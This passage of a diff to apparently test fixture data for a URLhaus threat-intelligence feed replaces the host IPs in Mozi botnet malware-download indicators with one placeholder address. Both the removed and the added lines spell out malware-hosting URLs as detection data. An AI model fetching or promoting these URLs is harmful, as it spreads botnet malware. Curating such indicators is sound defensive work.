"scheme": "http", "port": 43673, - "domain": "125.41.141.246", - "full": "http://125.41.141.246:43673/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43673/Mozi.m" }, - "ip": "125.41.141.246" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693512862Z", - "original": "{\"id\":\"961282\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961282/\",\"url\":\"http://125.41.141.246:43673/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.41.141.246\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026415700Z", + "original": "{\"id\":\"961282\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961282/\",\"url\":\"http://89.160.20.156:43673/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12877,18 +12877,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.42.123.186:55726/Mozi.m", + "original": "http://89.160.20.156:55726/Mozi.m", "scheme": "http", "port": 55726, - "domain": "125.42.123.186", - "full": "http://125.42.123.186:55726/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55726/Mozi.m" }, - "ip": "125.42.123.186" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693519213Z", - "original": "{\"id\":\"961283\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961283/\",\"url\":\"http://125.42.123.186:55726/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.42.123.186\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026422500Z", + "original": "{\"id\":\"961283\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961283/\",\"url\":\"http://89.160.20.156:55726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12926,18 +12926,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.86.244:59668/Mozi.m", + "original": "http://89.160.20.156:59668/Mozi.m", "scheme": "http", "port": 59668, - "domain": "182.119.86.244", - "full": "http://182.119.86.244:59668/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59668/Mozi.m" }, - "ip": "182.119.86.244" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693522910Z", - "original": "{\"id\":\"961284\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961284/\",\"url\":\"http://182.119.86.244:59668/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.86.244\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026429400Z", + "original": "{\"id\":\"961284\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961284/\",\"url\":\"http://89.160.20.156:59668/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12975,18 +12975,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.194.150.198:34391/Mozi.m", + "original": "http://89.160.20.156:34391/Mozi.m", "scheme": "http", "port": 34391, - "domain": "117.194.150.198", - "full": "http://117.194.150.198:34391/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34391/Mozi.m" }, - "ip": "117.194.150.198" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693526317Z", - "original": "{\"id\":\"961278\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961278/\",\"url\":\"http://117.194.150.198:34391/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.194.150.198\",\"date_added\":\"2021-01-14 19:19:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026436300Z", + "original": "{\"id\":\"961278\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961278/\",\"url\":\"http://89.160.20.156:34391/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13024,18 +13024,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.242.209.61:49478/Mozi.m", + "original": "http://89.160.20.156:49478/Mozi.m", "scheme": "http", "port": 49478, - "domain": "117.242.209.61", - "full": "http://117.242.209.61:49478/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49478/Mozi.m" }, - "ip": "117.242.209.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693529413Z", - "original": "{\"id\":\"961277\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961277/\",\"url\":\"http://117.242.209.61:49478/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.242.209.61\",\"date_added\":\"2021-01-14 19:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026443400Z", + "original": "{\"id\":\"961277\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961277/\",\"url\":\"http://89.160.20.156:49478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13073,18 +13073,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.200.34:54670/Mozi.m", + "original": "http://89.160.20.156:54670/Mozi.m", "scheme": "http", "port": 54670, - "domain": "117.247.200.34", - "full": "http://117.247.200.34:54670/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54670/Mozi.m" }, - "ip": "117.247.200.34" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693533270Z", - "original": "{\"id\":\"961276\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961276/\",\"url\":\"http://117.247.200.34:54670/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.200.34\",\"date_added\":\"2021-01-14 19:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026450300Z", + "original": "{\"id\":\"961276\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961276/\",\"url\":\"http://89.160.20.156:54670/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13122,18 +13122,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.133.53:59599/Mozi.m", + "original": "http://89.160.20.156:59599/Mozi.m", "scheme": "http", "port": 59599, - "domain": "115.58.133.53", - "full": "http://115.58.133.53:59599/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59599/Mozi.m" }, - "ip": "115.58.133.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693536646Z", - "original": "{\"id\":\"961270\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961270/\",\"url\":\"http://115.58.133.53:59599/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.133.53\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026457200Z", + "original": "{\"id\":\"961270\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961270/\",\"url\":\"http://89.160.20.156:59599/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13171,18 +13171,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.56.130.11:45189/Mozi.a", + "original": "http://89.160.20.156:45189/Mozi.a", "scheme": "http", "port": 45189, - "domain": "115.56.130.11", - "full": "http://115.56.130.11:45189/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45189/Mozi.a" }, - "ip": "115.56.130.11" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693540123Z", - "original": "{\"id\":\"961271\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961271/\",\"url\":\"http://115.56.130.11:45189/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.56.130.11\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026464100Z", + "original": "{\"id\":\"961271\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961271/\",\"url\":\"http://89.160.20.156:45189/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13220,18 +13220,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.85.210.224:60805/Mozi.a", + "original": "http://89.160.20.156:60805/Mozi.a", "scheme": "http", "port": 60805, - "domain": "120.85.210.224", - "full": "http://120.85.210.224:60805/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60805/Mozi.a" }, - "ip": "120.85.210.224" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693543649Z", - "original": "{\"id\":\"961272\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961272/\",\"url\":\"http://120.85.210.224:60805/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.85.210.224\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026471100Z", + "original": "{\"id\":\"961272\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961272/\",\"url\":\"http://89.160.20.156:60805/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13269,18 +13269,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.56.27.220:38888/Mozi.m", + "original": "http://89.160.20.156:38888/Mozi.m", "scheme": "http", "port": 38888, - "domain": "115.56.27.220", - "full": "http://115.56.27.220:38888/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38888/Mozi.m" }, - "ip": "115.56.27.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693547076Z", - "original": "{\"id\":\"961273\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961273/\",\"url\":\"http://115.56.27.220:38888/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.56.27.220\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026478Z", + "original": "{\"id\":\"961273\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961273/\",\"url\":\"http://89.160.20.156:38888/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13318,18 +13318,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.48.157.100:47869/Mozi.m", + "original": "http://89.160.20.156:47869/Mozi.m", "scheme": "http", "port": 47869, - "domain": "115.48.157.100", - "full": "http://115.48.157.100:47869/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47869/Mozi.m" }, - "ip": "115.48.157.100" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693550292Z", - "original": "{\"id\":\"961274\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961274/\",\"url\":\"http://115.48.157.100:47869/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.157.100\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026484900Z", + "original": "{\"id\":\"961274\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961274/\",\"url\":\"http://89.160.20.156:47869/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13367,18 +13367,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.157.241.40:57478/Mozi.m", + "original": "http://89.160.20.156:57478/Mozi.m", "scheme": "http", "port": 57478, - "domain": "103.157.241.40", - "full": "http://103.157.241.40:57478/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57478/Mozi.m" }, - "ip": "103.157.241.40" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693553408Z", - "original": "{\"id\":\"961275\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961275/\",\"url\":\"http://103.157.241.40:57478/Mozi.m\",\"url_status\":\"online\",\"host\":\"103.157.241.40\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026491900Z", + "original": "{\"id\":\"961275\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961275/\",\"url\":\"http://89.160.20.156:57478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13417,18 +13417,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://59.99.93.45:40256/bin.sh", + "original": "http://89.160.20.156:40256/bin.sh", "scheme": "http", "port": 40256, - "domain": "59.99.93.45", - "full": "http://59.99.93.45:40256/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40256/bin.sh" }, - "ip": "59.99.93.45" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693556594Z", - "original": "{\"id\":\"961269\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961269/\",\"url\":\"http://59.99.93.45:40256/bin.sh\",\"url_status\":\"offline\",\"host\":\"59.99.93.45\",\"date_added\":\"2021-01-14 19:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026498800Z", + "original": "{\"id\":\"961269\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961269/\",\"url\":\"http://89.160.20.156:40256/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13466,18 +13466,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://60.161.45.175:49035/Mozi.m", + "original": "http://89.160.20.156:49035/Mozi.m", "scheme": "http", "port": 49035, - "domain": "60.161.45.175", - "full": "http://60.161.45.175:49035/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49035/Mozi.m" }, - "ip": "60.161.45.175" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693560581Z", - "original": "{\"id\":\"961268\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961268/\",\"url\":\"http://60.161.45.175:49035/Mozi.m\",\"url_status\":\"online\",\"host\":\"60.161.45.175\",\"date_added\":\"2021-01-14 19:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026505700Z", + "original": "{\"id\":\"961268\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961268/\",\"url\":\"http://89.160.20.156:49035/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13515,18 +13515,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.54.215.77:41531/Mozi.m", + "original": "http://89.160.20.156:41531/Mozi.m", "scheme": "http", "port": 41531, - "domain": "61.54.215.77", - "full": "http://61.54.215.77:41531/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41531/Mozi.m" }, - "ip": "61.54.215.77" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693563747Z", - "original": "{\"id\":\"961266\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961266/\",\"url\":\"http://61.54.215.77:41531/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.54.215.77\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026512800Z", + "original": "{\"id\":\"961266\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961266/\",\"url\":\"http://89.160.20.156:41531/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13564,18 +13564,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.99.41.229:49596/Mozi.a", + "original": "http://89.160.20.156:49596/Mozi.a", "scheme": "http", "port": 49596, - "domain": "59.99.41.229", - "full": "http://59.99.41.229:49596/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49596/Mozi.a" }, - "ip": "59.99.41.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693567093Z", - "original": "{\"id\":\"961267\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961267/\",\"url\":\"http://59.99.41.229:49596/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.99.41.229\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026519800Z", + "original": "{\"id\":\"961267\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961267/\",\"url\":\"http://89.160.20.156:49596/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13613,18 +13613,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.197.146:43584/Mozi.m", + "original": "http://89.160.20.156:43584/Mozi.m", "scheme": "http", "port": 43584, - "domain": "61.52.197.146", - "full": "http://61.52.197.146:43584/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43584/Mozi.m" }, - "ip": "61.52.197.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693571421Z", - "original": "{\"id\":\"961265\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961265/\",\"url\":\"http://61.52.197.146:43584/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.197.146\",\"date_added\":\"2021-01-14 19:07:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026526700Z", + "original": "{\"id\":\"961265\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961265/\",\"url\":\"http://89.160.20.156:43584/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13662,18 +13662,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.92.181.82:44976/Mozi.m", + "original": "http://89.160.20.156:44976/Mozi.m", "scheme": "http", "port": 44976, - "domain": "59.92.181.82", - "full": "http://59.92.181.82:44976/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44976/Mozi.m" }, - "ip": "59.92.181.82" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693574838Z", - "original": "{\"id\":\"961264\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961264/\",\"url\":\"http://59.92.181.82:44976/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.92.181.82\",\"date_added\":\"2021-01-14 19:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026533500Z", + "original": "{\"id\":\"961264\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961264/\",\"url\":\"http://89.160.20.156:44976/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13711,18 +13711,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.75.46:51107/Mozi.m", + "original": "http://89.160.20.156:51107/Mozi.m", "scheme": "http", "port": 51107, - "domain": "58.249.75.46", - "full": "http://58.249.75.46:51107/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51107/Mozi.m" }, - "ip": "58.249.75.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693578465Z", - "original": "{\"id\":\"961259\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961259/\",\"url\":\"http://58.249.75.46:51107/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.75.46\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026540500Z", + "original": "{\"id\":\"961259\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961259/\",\"url\":\"http://89.160.20.156:51107/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 